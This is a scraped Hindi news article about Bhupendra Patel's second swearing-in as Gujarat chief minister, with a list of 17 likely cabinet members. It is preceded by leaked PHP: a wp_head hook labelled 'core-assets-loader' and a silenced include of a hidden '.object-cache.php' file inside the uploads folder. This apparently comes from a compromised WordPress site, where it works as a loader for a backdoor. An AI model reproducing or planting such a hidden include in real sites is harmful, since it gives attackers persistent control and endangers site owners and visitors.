add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गुजरात: आज दूसरी बार सीएम पद की शपथ लेंगे भूपेंद्र पटेल, कैबिनेट में इन चेहरों को मिल सकती है जगह, देखें पूरी लिस्ट – SOCH INDIA
Menu

देश
गुजरात: आज दूसरी बार सीएम पद की शपथ लेंगे भूपेंद्र पटेल, कैबिनेट में इन चेहरों को मिल सकती है जगह, देखें पूरी लिस्ट

nobanner

में भारतीय जनता पार्टी (BJP) को मिली रिकॉर्ड जीत के बाद नए मंत्रिमंडल के शपथ ग्रहण समारोह की तैयारियां चल रही है. भूपेंद्र पटेल (Bhupendra Patel) लगातार दूसरी बार गुजरात के मुख्यमंत्री की शपथ लेंगे. सोमवार (12 दिंसबर) को दोपहर 2 बजे नई सरकार का शपथ ग्रहण समारोह गांधीनगर के हेलीपैड ग्राउंड में होगा. प्रधानमंत्री नरेंद्र मोदी (PM Modi), केंद्रीय गृह मंत्री अमित शाह (Amit Shah), रक्षा मंत्री राजनाथ सिंह, बीजेपी अध्यक्ष जेपी नड्डा समेत बीजेपी शासित राज्यों के मुख्यमंत्री और कई केंद्रीय मंत्री शपथ ग्रहण कार्यक्रम में शामिल होंगे.

जानकारी के मुताबिक, नए मंत्रिमंडल के शपथ ग्रहण समारोह से पहले रात में पार्टी की ओर से तय नामों वाले विधायकों को सूचना दी गई. बीजेपी प्रदेश अध्यक्ष सीआर पाटिल (CR Patil) ने तय विधायकों को फोन कर जानकारी दी कि कल शपथ लेनी है. अभी तक जिन विधायकों को फोन कर शपथ लेने को लेकर जानकारी दी गई है, उनमें कुल 17 नाम शामिल हैं. इसलिए यह तय माना जा रहा है कि आज होने वाले शपथ ग्रहण समारोह में इन विधायकों को मंत्री बनाया जाएगा. इनमें कई नाम ऐसे हैं, जो पहली बार मंत्री बनेंगे. एबीपी न्यूज के पास इन संभावित मंत्रियों की लिस्ट मौजूद है. जिन विधायकों को बीजेपी प्रदेश अध्यक्ष की ओर से फोन कर शपथ लेने की जानकारी दी गई है, उनमें शामिल नाम इस प्रकार हैं.

संभावित मंत्रियों की लिस्ट

1. घाटलोडिया MLA – भूपेंद्र पटेल
2. मजूरा MLA – हर्ष संघवी
3. विसनगर MLA -ऋषिकेश पटेल
4. पारडी MLA – कनुभाई देसाई
5. जसदण MLA – कुंवरजी भाई बावलिया
6. खंभालिया MLA – मुलुभाई बेरा
7. जामनगर ग्रामीण MLA – राघवजी पटेल
8. भावनगर ग्रामीण MLA – पुरुषोत्तम भाई सोलंकी
9. सिद्धपुर MLA – बलवंत सिंह राजपूत
10. राजकोट ग्रामीण MLA – भानुबेन बाबरिया
11. संतरामपुर MLA – कुबेर भाई डिंडोर
12. देवगढ़ बारिया MLA – बच्चू खाबड़
13. निकोल MLA – जगदीश पांचाल
14. ओलपाड MLA – मुकेश पटेल
15. मोडासा MLA – भीखूभाई परमार
16. कामरेज MLA – प्रफुल पानसेरिया
17. मांडवी MLA – कुंवरजी हलपति

युवा, महिला और अनुभवी चेहरों को मंत्रीमंडल में जगह

इससे एक दिन पहले ही भूपेंद्र पटेल और गुजरात बीजेपी के अध्यक्ष सीआर पाटिल ने दिल्ली में प्रधानमंत्री नरेंद्र मोदी और गृहमंत्री अमित शाह से मुलाकात की थी. इस बैठक में गुजरात के मंत्रिमंडल को लेकर चर्चा हुई. इसके बाद ही मंत्रियों के नाम सामने आए हैं. बताया जा रहा है कि करीब 20-22 चेहरों को मंत्रिमंडल में जगह मिल सकती है, जिनमें 9 कैबिनेट और बाकी को राज्य मंत्री बनाया जा सकता है. नए मंत्रिमंडल में युवा, महिला और अनुभवी चेहरों को मिलाकर नए मंत्रिमंडल का गठन किया जाएगा.

गुजरात में भूपेंद्र पटेल के शपथ ग्रहण से पहले आज बीजेपी विधायकों की एक बड़ी बैठक होगी. बताया जा रहा है कि यह बैठक गांधीनगर के लीला होटल में होगी. इससे एक दिन पहले ही गुजरात में नई सरकार के शपथ ग्रहण कार्यक्रम में शामिल होने के लिए प्रधानमंत्री नरेंद्र मोदी अहमदाबाद पहुंचे हैं. पीएम मोदी ने अहमदाबाद में रोड शो किया और विधानसभा चुनाव में बीजेपी की बंपर जीत के लिए गुजरात की जनता का धन्यवाद किया. वहीं, रोड शो के दौरान गुजरात की जनता ने भी पीएम मोदी का अभिवादन किया.